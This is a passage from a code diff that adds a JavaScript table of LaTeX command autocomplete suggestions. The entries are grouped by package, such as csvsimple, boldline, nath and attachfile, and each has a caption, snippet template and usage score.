+ }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'gmp-cmd', + score: 0.021170869458413965, + }, + ], + csvsimple: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'csvsimple-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'csvsimple-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'csvsimple-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'csvsimple-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'csvsimple-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'csvsimple-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'csvsimple-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'csvsimple-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'csvsimple-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'csvsimple-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'csvsimple-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'csvsimple-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'csvsimple-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'csvsimple-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'csvsimple-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'csvsimple-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'csvsimple-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'csvsimple-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'csvsimple-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'csvsimple-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'csvsimple-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'csvsimple-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'csvsimple-cmd', + score: 0.008565354665444157, + }, + ], + ebgaramond: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'ebgaramond-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ebgaramond-cmd', + score: 0.008565354665444157, + }, + ], + boldline: [ + { + caption: '\\hlineB{}', + snippet: '\\hlineB{$1}', + meta: 'boldline-cmd', + score: 0.0009735563258863602, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'boldline-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'boldline-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'boldline-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'boldline-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'boldline-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'boldline-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'boldline-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'boldline-cmd', + score: 0.018615449342361392, + }, + ], + fontaxes: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fontaxes-cmd', + score: 0.008565354665444157, + }, + ], + pbsi: [ + { + caption: '\\bsifamily', + snippet: '\\bsifamily', + meta: 'pbsi-cmd', + score: 3.140504277052775e-5, + }, + ], + 'tikz-qtree-compat': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-qtree-compat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-qtree-compat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-qtree-compat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-compat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-compat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-qtree-compat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-qtree-compat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-compat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.2864294797053033, + }, + ], + 'ebgaramond-maths': [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'ebgaramond-maths-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ebgaramond-maths-cmd', + score: 0.008565354665444157, + }, + ], + complexity: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'complexity-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'complexity-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'complexity-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'complexity-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'complexity-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'complexity-cmd', + score: 0.0018957469739775527, + }, + ], + everysel: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'everysel-cmd', + score: 0.04598628699063736, + }, + ], + txfontsb: [ + { + caption: '\\sqrt{}', + snippet: '\\sqrt{$1}', + meta: 'txfontsb-cmd', + score: 0.20240160977404634, + }, + ], + nath: [ + { + caption: '\\vert', + snippet: '\\vert', + meta: 'nath-cmd', + score: 0.05152912629788525, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'nath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\quad', + snippet: '\\quad', + meta: 'nath-cmd', + score: 0.15242755832392743, + }, + { + caption: '\\underbrace{}', + snippet: '\\underbrace{$1}', + meta: 'nath-cmd', + score: 0.010373780436850907, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'nath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\delimgrowth', + snippet: '\\delimgrowth', + meta: 'nath-cmd', + score: 1.8073688234300064e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'nath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'nath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\underline{}', + snippet: '\\underline{$1}', + meta: 'nath-cmd', + score: 0.14748550887002482, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'nath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\qquad', + snippet: '\\qquad', + meta: 'nath-cmd', + score: 0.0878145577017131, + }, + ], + vietnam: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'vietnam-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'vietnam-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'vietnam-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'vietnam-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'vietnam-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'vietnam-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'vietnam-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'vietnam-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'vietnam-cmd', + score: 0.021170869458413965, + }, + ], + answers: [ + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'answers-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'answers-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'answers-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'answers-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'answers-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'answers-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'answers-cmd', + score: 0.0024547099784948665, + }, + ], + attachfile: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'attachfile-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'attachfile-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'attachfile-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'attachfile-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'attachfile-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'attachfile-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'attachfile-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'attachfile-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'attachfile-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'attachfile-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'attachfile-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'attachfile-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'attachfile-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'attachfile-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'attachfile-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'attachfile-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'attachfile-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'attachfile-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'attachfile-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'attachfile-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'attachfile-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'attachfile-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'attachfile-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'attachfile-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'attachfile-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'attachfile-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'attachfile-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'attachfile-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'attachfile-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'attachfile-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'attachfile-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'attachfile-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'attachfile-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'attachfile-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'attachfile-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'attachfile-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'attachfile-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'attachfile-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'attachfile-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'attachfile-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'attachfile-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'attachfile-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'attachfile-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'attachfile-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'attachfile-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'attachfile-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'attachfile-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'attachfile-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'attachfile-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'attachfile-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'attachfile-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'attachfile-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'attachfile-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'attachfile-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'attachfile-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'attachfile-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'attachfile-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'attachfile-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'attachfile-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'attachfile-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'attachfile-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'attachfile-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'attachfile-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'attachfile-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'attachfile-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'attachfile-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'attachfile-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'attachfile-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'attachfile-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'attachfile-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'attachfile-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'attachfile-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'attachfile-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'attachfile-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'attachfile-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'attachfile-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'attachfile-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'attachfile-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'attachfile-cmd', + score: 0.00926923425734719, + }, + { + caption: 